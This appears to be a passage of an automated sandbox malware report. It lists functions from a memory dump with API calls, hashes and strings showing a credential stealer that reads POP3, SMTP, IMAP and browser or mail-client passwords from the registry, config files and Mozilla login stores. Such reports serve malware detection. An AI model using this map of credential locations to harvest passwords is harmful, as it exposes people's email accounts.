                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptGetHashParam), ref: 0040480D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptHashData), ref: 00404819
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDestroyHash), ref: 00404825
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDecrypt), ref: 00404831
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDeriveKey), ref: 0040483D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptImportKey), ref: 00404849
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDestroyKey), ref: 00404855
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                          • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                          • API String ID: 2238633743-192783356
                                                                                                                                                                                          • Opcode ID: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                                                                                                                                                                          • Instruction ID: 96d911507a8a1b00aef88e3b883ab5eac538cf63a3166b36270edd586bbeed94
                                                                                                                                                                                          • Opcode Fuzzy Hash: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                                                                                                                                                                          • Instruction Fuzzy Hash: A501C974940744AFDB31AF769C09E06BEF1EFA97003224D2EE2C553650D77AA010DE49
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402DA5 Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                            • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402EBC
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402ECF
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402F5C
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402F69
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402FC3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                          • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                          • API String ID: 52435246-1534328989
                                                                                                                                                                                          • Opcode ID: 8606da5831358c67b4a99ee8b6ad117f72868ee6eb846870c269daa592ef00d8
                                                                                                                                                                                          • Instruction ID: 400a04a5c8efacb9c4641a70875855bf6b7e4888715d32951425251a7c23a99d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8606da5831358c67b4a99ee8b6ad117f72868ee6eb846870c269daa592ef00d8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 575130B1900118BBEF11EB51DD41FEE777CAF04754F5080A7BA0CA6192DBB89B858F98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406B9A Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00406BA4
                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00406BC1
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406BD2
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00406BDF
                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BF2
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 00406C01
                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00406C0A
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406C12
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00406C1E
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406C29
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00406C32
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2565263379-0
                                                                                                                                                                                          • Opcode ID: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
                                                                                                                                                                                          • Instruction ID: 428d7c431cb1422a1915013c6704b220f4cf118cce9454ff27e0024ace88079b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2114239904605FFEF105FA4DC4CB9E7FB8EB46755F104035F542E1192DB7489508A69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406C3D Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00406C45
                                                                                                                                                                                          • strlen.MSVCRT ref: 00406C52
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C0BB,?), ref: 00406C61
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00406C6E
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406C77
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 00406C80
                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00406C89
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00406C99
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2315226746-0
                                                                                                                                                                                          • Opcode ID: ee3e5d8b8b8103545cd3f6b58303d98c31de17f75192de6e2f85eb2c234adac6
                                                                                                                                                                                          • Instruction ID: 8edcd2d2b4f986e571765b3eebb92d88a59871b3330cf63fe52768e208e874e1
                                                                                                                                                                                          • Opcode Fuzzy Hash: ee3e5d8b8b8103545cd3f6b58303d98c31de17f75192de6e2f85eb2c234adac6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23F0E93B5047186BD7102FA1BC4CE6BBB2CDB86F96B050039FA0AD6253DE755C0447B9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004033E2 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                          • API String ID: 3963849919-1658304561
                                                                                                                                                                                          • Opcode ID: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
                                                                                                                                                                                          • Instruction ID: 1b90a5eb0bf433dfd26fdc49de6d86aad9c02d214cf5b02dd481862667588e5e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
                                                                                                                                                                                          • Instruction Fuzzy Hash: EF21F47180151C6EDB51EB11DD82FEE777C9B44705F4004ABBA09B1092DBBC6BC68E59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004016FC Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                          • String ID: E$ E$ E
                                                                                                                                                                                          • API String ID: 1865533344-1090515111
                                                                                                                                                                                          • Opcode ID: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                                                                                                                                                                          • Instruction ID: 87a0be596659d04b7e64c8373dbe8b7d58709088cb568d7826d55e868489c559
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E115A74900209EFCF119F90C905AAE3BB1AF08312F00806AFC156B2A2C7799911DFAA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044227B Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strlen.MSVCRT ref: 0044269A
                                                                                                                                                                                          • _strncoll.MSVCRT ref: 004426AA
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00442726
                                                                                                                                                                                          • atoi.MSVCRT ref: 00442737
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00442763
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                                                                                                                                                                          • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                          • API String ID: 1864335961-3210201812
                                                                                                                                                                                          • Opcode ID: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                                                                                                                                                                          • Instruction ID: 53082eb74af2b51306e1b07bdc149dea26fd0daa9c3b29582cc647e8b6ddbc01
                                                                                                                                                                                          • Opcode Fuzzy Hash: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                                                                                                                                                                          • Instruction Fuzzy Hash: 90F112B080625CDBFB61CF54D9897DEBBB0EB01308F5881CAD4597B251C7B81A89CF99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044315E Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                          • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                          • API String ID: 1714764973-479759155
                                                                                                                                                                                          • Opcode ID: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                                                                                                                                                                          • Instruction ID: 5e0940cb4a553810ccd5eed58eee7b2aa7af7a3cc246567a3fd24b3687d2e464
                                                                                                                                                                                          • Opcode Fuzzy Hash: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                                                                                                                                                                          • Instruction Fuzzy Hash: AD9191B260C7049AF628BB329D43B9B33D8AF50719F10043FF95AB61C2EE6DB905465D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E417 Relevance: 68.7, APIs: 25, Strings: 14, Instructions: 449COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E6BB
                                                                                                                                                                                            • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E70C
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E728
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,%@,000000FF,?,00000104,?,?,?,?,?,?,0040EC25,?,00000000), ref: 0040E73F
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040EC25,?), ref: 0040E75E
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E7C0
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E7D5
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E83A
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E850
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E866
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E87C
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E892
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E8A8
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E8C2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                          • String ID: $"$$$$$%@$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                          • API String ID: 3137614212-1813914204
                                                                                                                                                                                          • Opcode ID: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                                                          • Instruction ID: 60cbd65c12865ccb94f157c96bc1922d811664869268201cbad442dfa9876f55
                                                                                                                                                                                          • Opcode Fuzzy Hash: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9228E218087DA9DDB31D6BC9C456CDBF646B16234F0803DAF1E8BB2D2D7344A46CB66
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040DA89 Relevance: 61.5, APIs: 21, Strings: 14, Instructions: 232stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _strcmpi$strlen$_strncoll$atoimemset$memcpy
                                                                                                                                                                                          • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                                                                                                                          • API String ID: 594115653-593045482
                                                                                                                                                                                          • Opcode ID: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                                                          • Instruction ID: 1e907043fac54bf2e371806c1eb24ba38ca233ac5dd260cadef0f6990961d541
                                                                                                                                                                                          • Opcode Fuzzy Hash: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C71D832804204AEFF14ABA1DD02B9E77B5DF91329F21406FF545B21C1EB7D9A18D64C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E070 Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 279COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                            • Part of subcall function 004086A5: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                            • Part of subcall function 004086A5: CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                            • Part of subcall function 00408763: _mbsicmp.MSVCRT ref: 0040879D
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E123
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E138
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E19F
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1B5
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1CB
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1E1
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1F7
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E20A
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E225
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E23C
                                                                                                                                                                                            • Part of subcall function 00406582: memset.MSVCRT ref: 004065A3
                                                                                                                                                                                            • Part of subcall function 00406582: memcmp.MSVCRT ref: 004065CD
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E29D
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E2B4
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E2CB
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E2E6
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E2FB
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E310
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E326
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E33F
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E358
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E374
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                          • String ID: C@$encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                          • API String ID: 4171719235-3249434271
                                                                                                                                                                                          • Opcode ID: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                                                                                                                                                                          • Instruction ID: 4eb083177fa9c3dcba641838e0e399a852ec85db15ddf69852980c8670b79128
                                                                                                                                                                                          • Opcode Fuzzy Hash: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                                                                                                                                                                          • Instruction Fuzzy Hash: EFA16672D04219AEDF10EBA1DC41ADE77BCAF44304F1044BFF645B7181DA38AA988F59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040FD76 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0040FDA3
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040FDAF
                                                                                                                                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 0040FDBE
                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0040FDCA
                                                                                                                                                                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0040FDD3
                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0040FDDF
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0040FDF1
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040FDFC
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE10
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE1E
                                                                                                                                                                                          • GetDC.USER32 ref: 0040FE57
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040FE97
                                                                                                                                                                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040FEA8
                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 0040FEF5
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040FFB5
                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 0040FFC9
                                                                                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 0040FFE7
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 0041001D
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041002D
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041003B
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00410052
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041005C
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 004100A2
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004100AC
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 004100E4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                          • API String ID: 1703216249-3046471546
                                                                                                                                                                                          • Opcode ID: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
                                                                                                                                                                                          • Instruction ID: 60093129ffb9b10d71bc98ba01756b195f92c815bd96d79b3314cc8c80e42073
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62B1DE71108741AFDB20DF68C985E6BBBE9FF88704F00492EF69992261DB75E804CF56
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040243C Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004024E7
                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402525
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004025EF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                          • API String ID: 168965057-606283353
